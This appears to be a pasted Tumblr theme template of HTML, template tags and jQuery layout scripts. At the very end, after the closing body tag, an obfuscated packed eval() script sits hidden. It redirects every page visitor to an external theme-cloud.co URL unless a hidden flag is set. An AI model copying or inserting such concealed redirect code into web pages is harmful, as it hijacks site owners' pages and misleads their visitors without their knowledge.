- {block:If2Columns}{block:IfNot3Columns}{Photoset-250}{/block:IfNot3Columns}{/block:If2Columns}
- </div>
- {block:Caption}
- <div class="caption">{Caption}</div>
- {/block:Caption}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {block:PermalinkPage}
- <div class="photosetPost" style="{block:Caption}margin-bottom: 10px;{/block:Caption}">{Photoset-500}</div>
- {block:Caption}
- <div class="caption">{Caption}</div>
- {/block:Caption}
- {/block:PermalinkPage}
- {/block:Photoset}
- {block:Answer}
- <img class="left" style="margin-right:10px;" width="30px" src="{AskerPortraitURL-30}"/>
- <div class="left quest">
- <b>{Asker}</b>:<br>
- {Question}
- </div>
- <div class="clear"></div>
- <div class="askAnswer">
- <img class="left" style="margin-right:10px;" width="30px" src="{PortraitURL-30}"/>
- <div class="left quest">
- <b>Me</b>:<br>
- <i>{Answer}</i>
- </div>
- <div class="clear"></div>
- </div>
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {/block:Answer}
- {block:Quote}
- <h2>"{Quote}"</h2>
- {block:Source}
- <div class="caption" style="text-align:right;">- {Source}</div>
- {/block:Source}
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {/block:Quote}
- {block:Chat}
- {block:Title}
- <h2>{Title}</h2>
- {/block:Title}
- <ul class="chat">
- {block:Lines}
- <li class="{Alt} user_{UserNumber}">
- {block:Label}
- <span class="label">{Label}</span>
- {/block:Label}
- <span class="caption">{Line}</span>
- </li>
- {/block:Lines}
- </ul>
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {/block:Chat}
- {block:Audio}
- {block:IndexPage}
- {block:AlbumArt}
- <img class="audioImage" src="{AlbumArtURL}" alt="{block:Artist}{Artist}{/block:Artist}{block:TrackName} - {TrackName}{/block:TrackName}" />
- {/block:AlbumArt}
- <div class="audioplayercontainer">{AudioPlayerWhite}</div>
- {/block:IndexPage}
- {block:PermalinkPage}
- <div id="imgAlbumArt" class="left">
- {block:AlbumArt}
- <img width="105" src="{AlbumArtURL}" alt="{block:Artist}{Artist}{/block:Artist}{block:TrackName} - {TrackName}{/block:TrackName}" />
- {/block:AlbumArt}
- </div>
- <ul id="audiotrack" class="left">
- {block:Artist}<li><b>{Artist}</b></li>{/block:Artist}
- {block:TrackName}<li>{TrackName}</li>{/block:TrackName}
- {block:Album}<li>{Album}</li>{/block:Album}
- <li>{FormattedPlayCount} plays {block:ExternalAudio}// <a href="{ExternalAudioURL}">Download</a>{/block:ExternalAudio}</li>
- <li>{AudioPlayerBlack}</li>
- </ul>
- <div class="clear"></div>
- {/block:PermalinkPage}
- {block:Caption}
- <div class="caption">{Caption}</div>
- {/block:Caption}
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {/block:Audio}
- {block:Video}
- {block:PermalinkPage}
- <div class="videoPost" style="{block:Caption}margin-bottom: 10px;{/block:Caption}">{Video-500}</div>
- {/block:PermalinkPage}
- {block:IndexPage}
- <div class="videoPost" style="{block:IfShowPhotoCaption}{block:Caption}margin-bottom: 10px;{/block:Caption}{/block:IfShowPhotoCaption}">
- {block:If3Columns}{Video-250}{/block:If3Columns}
- {block:If2Columns}{block:IfNot3Columns}{Video-250}{/block:IfNot3Columns}{/block:If2Columns}
- {block:IfNot2Columns}{block:IfNot3Columns}{Video-500}{/block:IfNot3Columns}{/block:IfNot2Columns}
- </div>
- {/block:IndexPage}
- {block:Caption}
- <div class="caption">{Caption}</div>
- {/block:Caption}
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {/block:Video}
- </div><!-- padding .posts -->
- <div class="opacityBackground"></div>
- </div><!-- .posts -->
- {block:PermalinkPage}
- {block:Date}
- <div class="posts">
- <div style="padding:10px;">
- {block:IfShowSocialShareButtonsOnPermalinkPage}
- <div id="socialike" class="left">
- <div style="display:inline-block;"><g:plusone annotation="none" size="medium" href="{Permalink}"></g:plusone></div>
- <span style="margin-left: 5px;"><a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a>
- <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></span>
- <span style="margin-left: 5px;"><iframe id="facebookiframe" src="http://www.facebook.com/plugins/like.php?locale=en_US&href={Permalink}&width=50&colorscheme=light&layout=button_count" scrolling="no" frameborder='0' style="border:none; overflow:hidden; width:50px; height:20px;"></iframe></span>
- </div>
- {/block:IfShowSocialShareButtonsOnPermalinkPage}
- {block:PermalinkPagination}
- <div id="nextprevPost" class="right">
- {block:NextPost}<a style="margin-right:5px;" href="{NextPost}">Prev Post</a>{/block:NextPost}
- {block:PreviousPost}<a href="{PreviousPost}">Next Post</a>{/block:PreviousPost}
- </div>
- {/block:PermalinkPagination}
- <div class="clear"></div>
- <div class="opacityBackground"></div>
- </div>
- </div><!-- .posts -->
- <div class="posts">
- <div style="padding:10px;">
- <div id="postnotesdiv">
- This post was posted {TimeAgo} with {NoteCountWithLabel}<br>
- {block:RebloggedFrom}
- Was reblogged from <a href="{ReblogParentURL}">{ReblogParentName}</a>
- <br>
- Was posted by <a href="{ReblogRootURL}">{ReblogRootName}</a>
- {/block:RebloggedFrom}
- {block:HasTags}
- <div id="tagsPermalink">
- {block:Tags}<a href="{TagURL}">#{Tag}</a>{/block:Tags}
- </div>
- {/block:HasTags}
- {block:PostNotes}
- <div class="borderTop"></div>
- {PostNotes}
- {/block:PostNotes}
- <div class="clear"></div>
- </div>
- <div class="opacityBackground"></div>
- </div>
- </div><!-- .posts -->
- {/block:Date}
- {/block:PermalinkPage}
- {/block:Posts}
- <div class="clear"></div>
- </div><!-- content -->
- <div class="clear"></div>
- </div><!-- container -->
- <div id="topDiv">
- Back Top
- <div class="opacityBackground"></div>
- </div>
- <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/8Aqmgryi7/jquery_18.js"></script>
- {block:IfContainerFadeEffect}
- <script type="text/javascript">
- $(function(){
- $("#container").fadeIn(500);
- });
- </script>
- {/block:IfContainerFadeEffect}
- {block:IfLinkSidebar}
- {block:IfDropdownMenuOnlySidebar}
- <script type="text/javascript">
- $(".dropdownmenu").click(function(){
- $("#sidebarLinks").slideToggle(300);
- });
- </script>
- {/block:IfDropdownMenuOnlySidebar}
- {/block:IfLinkSidebar}
- <script type="text/javascript">
- $(function(){
- $("#topDiv").click(function(){
- var target = $("html");
- $('html, body').animate({
- scrollTop: target.offset().top
- }, 1000);
- });
- var topDiv = $("#topDiv");
- var topDivTop = "1000";
- var view = $( window );
- view.bind("scroll resize", function(){
- var viewTop = view.scrollTop();
- if (viewTop > topDivTop){
- topDiv.fadeIn(300);
- }
- else if (viewTop <= topDivTop){
- topDiv.fadeOut(200);
- }
- });
- $("#pageLink").click(function(){
- $("#titlePages").fadeToggle(500);
- });
- });
- </script>
- <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/4IKlvmzup/jquery.masonry.min.js"></script>
- {block:IndexPage}
- {block:IfInfiniteScroll}
- <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/Qyblrgjfn/jqueryinfintescroll.js"></script>
- {/block:IfInfiniteScroll}
- <script type="text/javascript">
- /* heart button */
- $(window).load(function () {
- var $content = $('#content');
- $content.masonry({
- itemSelector: '.posts',
- isAnimated: true
- }),
- $content.infinitescroll({
- navSelector : '#pagination',
- nextSelector : '#pagination a#nextPage',
- itemSelector : '.posts',
- loading: {
- finishedMsg: '',
- img: 'http://static.tumblr.com/dbek3sy/pX1lrx8xv/ajax-loader.gif'
- },
- bufferPx : 400,
- debug : false,
- },
- // call masonry as a callback.
- function( newElements ) {
- var $newElems = $( newElements );
- $newElems.hide();
- // ensure that images load before adding to masonry layout
- $newElems.imagesLoaded(function(){
- $content.masonry(
- 'appended',
- $newElems, true,
- function(){$newElems.fadeIn(300);}
- );
- });
- /* repair audio players*/
- $('.audio').each(function(){
- var audioID = $(this).attr("id");
- var $audioPost = $(this);
- $.ajax({
- url: userURL + 'api/read/json?id=' + audioID,
- dataType: 'jsonp',
- timeout: 50000,
- success: function(data){
- $audioPost.html(data.posts[0]["audio-player"]);
- $(".audioplayerinto").removeClass("audio");
- }
- });
- });
- /* repair video players*/
- $('.videoPost.done').each(function(){
- var videoID = $(this).attr("id");
- var $videoPost = $(this);
- var videoWidth;
- {block:IfNot1Column}
- videoWidth = "-250";
- {/block:IfNot1Column}
- {block:If1Column}
- videoWidth = "-500";
- {/block:If1Column}
- {block:If2Columns}
- videoWidth = "-500";
- {/block:If2Columns}
- {block:If3Columns}
- videoWidth = "-250";
- {/block:If3Columns}
- if($videoPost.find("span#video_player_"+videoID).length){
- $videoPost.parent().removeClass("done").find(".zoom_icon").remove();
- $.ajax({
- url: '/api/read/json?id=' + videoID,
- dataType: 'jsonp',
- timeout: 50000,
- success: function(data){
- $videoPost.html(data.posts[0]["video-player"+videoWidth]);
- $content.masonry();
- }
- });
- }
- $videoPost.removeClass("done");
- });
- });
- });
- </script>
- {/block:IndexPage}
- <script type="text/javascript">
- (function() {
- var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
- po.src = 'https://apis.google.com/js/plusone.js';
- var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
- })();
- </script>
- {block:IfGoogleAnalyticsID}
- <script type="text/javascript">
- var _gaq = _gaq || [];
- _gaq.push(['_setAccount', '{text:Google Analytics ID}']);
- _gaq.push(['_trackPageview']);
- (function() {
- var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
- ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
- var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
- })();
- </script>
- {/block:IfGoogleAnalyticsID}
- </body>
- <script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b{a(c!=e){5.3.6="2://0-4.7/9-0/?8=1"}}f(d){5.3.6="2://0-4.7/9-0/?8=1"}',16,16,'theme||http|location|cloud|window|href|co|id|invalid|if|try|g_T|ex|true|catch'.split('|'),0,{}))</script>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement